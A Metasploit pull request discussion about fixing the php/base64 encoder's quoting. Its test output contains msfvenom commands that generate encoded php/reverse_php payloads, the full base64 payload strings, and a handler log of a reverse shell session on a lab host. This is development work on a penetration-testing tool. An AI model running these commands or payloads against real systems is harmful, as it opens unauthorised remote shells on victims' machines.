Fix php/base64 encoder

[jvoisin]

Having things like 'abcde.chr(43).fgh' doesn't fly in php, but 'abcde'.chr(43).'fgh' does.

[jheysel-r7]

Thank you for this fix @jvoisin! I tested this PR in conjunction with #19377

Verified that the previous implementation generated php that did indeed not fly

➜  metasploit-framework git:(18ee2cde77) ✗ ./msfvenom -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1679 (iteration=0)
php/base64 chosen with final size 1679
Payload size: 1679 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ.chr(47).p5fwRhCKHeabaXBti7TlqBIsWJu6yXph6ErWJmibCYyqZH0kqDdf99RbyYldykw7NscxLLvnjvey8M7I4TQ9MkPP5XrEp5Ppgeoep0xpaQiipVSGS5W4Wx8eqaZIYZvGCn4hptKxFdCKka2mimSLgEbxlYqOAFwiDfpPWH3jG4Nl6KyxRGYNYcEGddJBV5ZMHxLlwUj.chr(43).VZQi9e4Q.chr(47).I8PGSb0jyE1mY8.chr(47).tjIGx.chr(43).lYisba5FSFuLpuwi9.chr(47).2qKI.chr(47).tX4U99OLsvC5kB8jP6VKn0gWzSMsRG8U0P9BcrNPu4xyLcQZpn9Qh4mWaZSnD87fEk.chr(47).mYSP3s2iXENDWx5kxN4nR4ctIm2.chr(43).UPluDY6xPxSqfnb.chr(43).chr(43).x8sXj1J95l3wKRBwgD6tRnVchlWlRR7rLsqorCF.chr(43).fzqwt0mCRIQ67wHy5.chr(43).XpA3VxHCd1xgNB4jJ1eaBHQyQsc.chr(47).HsW.chr(47).i1E.chr(47).3eBXOv.chr(47).t5mWCuSY0LQrbTdw1.chr(43).1bmNw.chr(43).XoBSkKlen2fW4cRBivWZFUTEHj4.chr(43).ODhtbTx4NmCCTDwH94LVpj.chr(43).tSlkz4XmvR0GFeJpUKKhphhV2ayOT12.chr(47).l8J4ATIGnFtNwq4CCYup4QulvzgkFrmcyHSutvkuSKpZlVRvHs.chr(43).MQ5bFdg99NZSQup66MezTnV2qzVtpd2Kx1kLpdEmxQusxNFi7b08goBYLi.chr(43).hEphmAC6OlpQMZERWrBUhI9GOWz3Zxvdu28IWaRtUyD94G4kFyFdqzCeja1y0nx.chr(43).LBb9oA3b9MhXy76oWjX2v6tVqSQle5jciYdVW6ciK1jSQWy56jrW77jkJYxnS.chr(47).TIl9ztk0A57Rf9T7fCY32Ffhe.chr(47).97nvML8F9Pnvct4G3.chr(47).C.chr(43).zmdvpTyuzPwx1akUM1slAOHr6.chr(47).dASDtd.dYKFrMiFdlvptJ3UzpgLca4lva07AoEdtlPOVfR6EsDy65ThyNDy.chr(43).chr(43).nUXRKjqNoPXYp1OWEINwXT0fHs5Dv.chr(47).amwNShDG3mTS26Ud7NDvWfR0jGDWY5oh7PWBrjOuHOTT6Ot47DYB2fpWK8N1d1K7.chr(43).2PLDUafPqE9OthiBrtbBKElxH.chr(47).r.chr(43).PY3ap1G4i8117EfWX0xrEWS5Cl46s3W.chr(47).E5xw2y12qZ6xoNo9o9bxwscNdj0eUPK1reXkm207bO9.chr(43).XAWuDl.chr(47).QV6.chr(43).vriOrt48.chr(47).4VcXV9enL.chr(43).Cz3Ny.chr(47).XzRue5MpBCMmuro.chr(43).qdEjxYtsItw5B02GvKntfifRl9Oo0GV.chr(47).w2bhs7g4AgiK.chr(43).xctgQbMKyjQ49oB38DIw8ZMA')));
➜  metasploit-framework git:(18ee2cde77) ✗ vim shell.php
➜  metasploit-framework git:(18ee2cde77) ✗ php shell.php
PHP Warning:  gzuncompress(): data error in /home/msfuser/git/metasploit-framework/shell.php on line 3

With these changes the php/base64 encoder with now generates a proper payload with or without the Compress option set

➜  metasploit-framework git:(18ee2cde77) ✗ ./msfvenom -p php/reverse_php LHOST=172.16.199.1 LPORT=4444 -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1715 (iteration=0)
php/base64 chosen with final size 1715
Payload size: 1715 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ'.chr(47).'p5fwRhCKHWabaXBts7TlqBItqJuEizeMKwrWJmiY7YyqZI0nKDtf99RsmRScpYCw77Nhi357rnjvTy6M0IIjZ788FO5LOH6ZHSAqtcpU0oqolgpleHiNhxHk1PNDDF8xUjBV9xUIn4rpGJkrZki2RywYWKlghMAh3iV3RF2x'.chr(43).'jacCkqWxyD2faQIOc6rcC3Fgy'.chr(47).'snnByGItqMVr3CL5Ijxkq9Lch9Ymij5u5VsfpWK3NtYioyzEo9cxevPVCMf2XeEnPpzdlYXMAfmAPlMquyerrAyxUXzVAX1mhWYf91iEO8j2Wl0CXmZ5rlKcfHs8TL4ZJs'.chr(43).'eDRNcQwNb3vQEXpODgybRJn'.chr(43).'oHNdGh1hLLWb5TG4u8C71BoV22jCgTmVuCznPiiq'.chr(43).'XX5tPVF4cTa9OUeHaYo0ZAmf8PqXa3J1EyO84QKjKEJOljQN6HCAjn88Sv4Sg26iwR90'.chr(43).'nOKuSY0KwrbRdw2'.chr(43).'ZW5'.chr(43).'vDn5e'.chr(43).'gFaSqU6vaNbeyh0SXrCgqwuDo6OiwMfUUcY8BMn0b0Ldee3qey0xrs1Trjt9W3PMq50SbDPjskKNB2zpP3PMBDAwmVArDBHTM0YKKiZzQgmUijB4JUklKZMlEN8pW3k9'.chr(43).'mYm8YGkLgdjimo31Ny55CQ8dVjiKfclmnySKA'.chr(47).'tD'.chr(43).''.chr(47).'ld'.chr(47).'jad7gSbJS8Y0JRJiLxCv07euEFZm2G6UCzLd4A4GR'.chr(43).'fOG4'.chr(47).'t3enVfC0kJqF23weKZS'.chr(43).'14atuhyphV'.chr(47).'UyRr7X'.chr(47).'VxD4EfpG5nciBkkbaJgfRjeye5COlShck4ssrh9v4RSu2j0wNUWpRp2VDI8uUfKAAHwLOumJZrBSMXTP3'.chr(43).'exTpKj16LMouMVxquCTZEgS87UvZK'.chr(43).'rYn0'.chr(43).'tSjGzVgIQvr7'.chr(43).'DoS0M1WnWMiq.C2i3iCbNcHYmXIgXWtL3dYGBtYfNfHMVnSoHsO9aZTgwtPx'.chr(43).'NHL3wiCuVkKbYl1ImL7bcun4eHzync'.chr(43).'htUEpwtjrjl7P7USHTo7jpxGCIY9pjrDXB7rMuXKQT'.chr(43).'Ovk8h9QpGtb7UrXHcntbsPa24w'.chr(43).'vQJ7dHB4jLYXR8IzSH'.chr(43).'945vf4nWaaTOKnO9'.chr(43).'mHV9LbwNF1k4KZDrsVGccNsqZqOesa9UPbzzfECR'.chr(47).'U2'.chr(43).'2LLxsa3l4'.chr(47).'tsm2yHSVwFrg5uyAvLs9n8c3V85fkZvbr'.chr(43).'dkruJ'.chr(43).'S2fPr1nVrIoVg1FRH138dOpxogG2EA'.chr(43).''.chr(43).'wQZ88jcX'.chr(47).'HPpCDvVK'.chr(47).'G'.chr(43).'o1HcGB8cQWWFnrWVXj14tFzosO'.chr(47).'gbCuwRMA')));
➜  metasploit-framework git:(18ee2cde77) ✗ vim shell.php
➜  metasploit-framework git:(18ee2cde77) ✗ php shell.php

The handler receiving the payload generated above:

msf6 payload(php/reverse_php) >
[*] Command shell session 2 opened (172.16.199.1:4444 -> 172.16.199.158:36264) at 2024-08-26 15:49:05 -0400
msf6 payload(php/reverse_php) >
msf6 payload(php/reverse_php) > sessions -i -1
[*] Starting interaction with 2...

uname -a
Linux ubuntu 5.15.0-92-generic #102~20.04.1-Ubuntu SMP Mon Jan 15 13:09:14 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
php -v
PHP 7.4.3-4ubuntu2.19 (cli) (built: Jun 27 2023 15:49:59) ( NTS )
Copyright (c) The PHP Group
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.3-4ubuntu2.19, Copyright (c), by Zend Technologies
[*] 172.16.199.158 - Command shell session 2 closed.

[jheysel-r7]

Release Notes

This fixes the php/base64 encoder which was previously generating php payloads that were failing when being being run due to the way single quotes were being inserted into the payload.

[egypt]

A big part of the original design for this was to avoid using quotes. If we already have to quote everything for modern PHP without bareword->string conversion, this whole encoder can be greatly simplified by cutting out all of the chr() replacements as well as the splicing to get around the character limit for identifiers.

[jvoisin]

A big part of the original design for this was to avoid using quotes. If we already have to quote everything for modern PHP without bareword->string conversion, this whole encoder can be greatly simplified by cutting out all of the chr() replacements as well as the splicing to get around the character limit for identifiers.

That's the plan, but I prefer small commits :)

[jheysel-r7]

Thanks for chiming in and providing context @egypt, it's much appreciated.

Thanks for having a plan in place @jvoisin, I'll be keeping my eye out for future improvements.